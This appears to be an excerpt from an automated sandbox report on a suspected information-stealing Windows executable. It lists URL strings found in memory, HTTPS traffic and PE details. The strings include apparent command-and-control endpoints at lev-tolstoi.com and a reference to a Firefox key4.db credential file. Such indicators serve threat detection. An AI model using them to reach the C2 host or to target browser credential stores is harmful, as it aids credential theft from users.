Source: 6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: 6GNqkkKY0j.exe, 00000000.00000003.3005561903.0000000005D3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 6GNqkkKY0j.exe, 00000000.00000003.3005561903.0000000005D3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: 6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: 6GNqkkKY0j.exe, 00000000.00000003.3005561903.0000000005D3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: 6GNqkkKY0j.exe, 00000000.00000003.3019711227.000000000142A000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3042608843.0000000001435000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2760225701.0000000001426000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075806149.0000000001442000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3042684703.0000000001442000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2397268790.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2397268790.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075561492.0000000001437000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075431589.0000000001437000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3042472090.000000000142A000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000002.3081493922.0000000001443000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181401742.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/4
Source: 6GNqkkKY0j.exe, 00000000.00000003.2695354440.00000000013E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/9
Source: 6GNqkkKY0j.exe, 00000000.00000003.3075806149.0000000001442000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075561492.0000000001437000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075431589.0000000001437000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000002.3081493922.0000000001443000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/A
Source: 6GNqkkKY0j.exe, 00000000.00000003.2760225701.0000000001426000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/Q
Source: 6GNqkkKY0j.exe, 00000000.00000002.3081414625.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000002.3080379491.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181401742.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3002699637.0000000001423000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/api
Source: 6GNqkkKY0j.exe, 00000000.00000003.3075064425.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075375880.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000002.3080379491.00000000013E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/api4&
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181401742.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/ee
Source: 6GNqkkKY0j.exe, 00000000.00000003.3042608843.0000000001435000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075806149.0000000001442000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3042684703.0000000001442000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2397268790.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075561492.0000000001437000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075431589.0000000001437000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181401742.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3042472090.000000000142A000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000002.3081493922.0000000001443000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/pi
Source: 6GNqkkKY0j.exe, 00000000.00000003.2760225701.0000000001426000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/pi9
Source: 6GNqkkKY0j.exe, 00000000.00000003.3042472090.0000000001452000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3019711227.0000000001452000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075523758.0000000001452000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3024468196.0000000001452000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000002.3081527231.0000000001452000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com:
Source: 6GNqkkKY0j.exe, 00000000.00000003.2397441650.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2397503538.00000000013E4000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2397268790.00000000013DF000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2760225701.0000000001454000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com:443/api
Source: 6GNqkkKY0j.exe, 00000000.00000003.3019711227.000000000142A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com:443/apizchhhv.default-release/key4.dbPK
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: 6GNqkkKY0j.exe, 00000000.00000003.3005002977.0000000005DD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 6GNqkkKY0j.exe, 00000000.00000003.3005002977.0000000005DD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: 6GNqkkKY0j.exe, 00000000.00000003.3005561903.0000000005D3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: 6GNqkkKY0j.exe, 00000000.00000003.3005561903.0000000005D3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: 6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 6GNqkkKY0j.exe, 00000000.00000003.3005002977.0000000005DD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: 6GNqkkKY0j.exe, 00000000.00000003.3005002977.0000000005DD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: 6GNqkkKY0j.exe, 00000000.00000003.3005002977.0000000005DD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 6GNqkkKY0j.exe, 00000000.00000003.3005002977.0000000005DD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 6GNqkkKY0j.exe, 00000000.00000003.3005002977.0000000005DD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: 6GNqkkKY0j.exe, 00000000.00000003.3005002977.0000000005DD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49888 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888

Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49874 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49880 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49886 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49888 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: 6GNqkkKY0j.exe	Static PE information: section name:
Source: 6GNqkkKY0j.exe	Static PE information: section name: .rsrc
Source: 6GNqkkKY0j.exe	Static PE information: section name: .idata

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7CFE	0_3_013F7CFE
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7CFE	0_3_013F7CFE
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7CFE	0_3_013F7CFE
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7CE0	0_3_013F7CE0
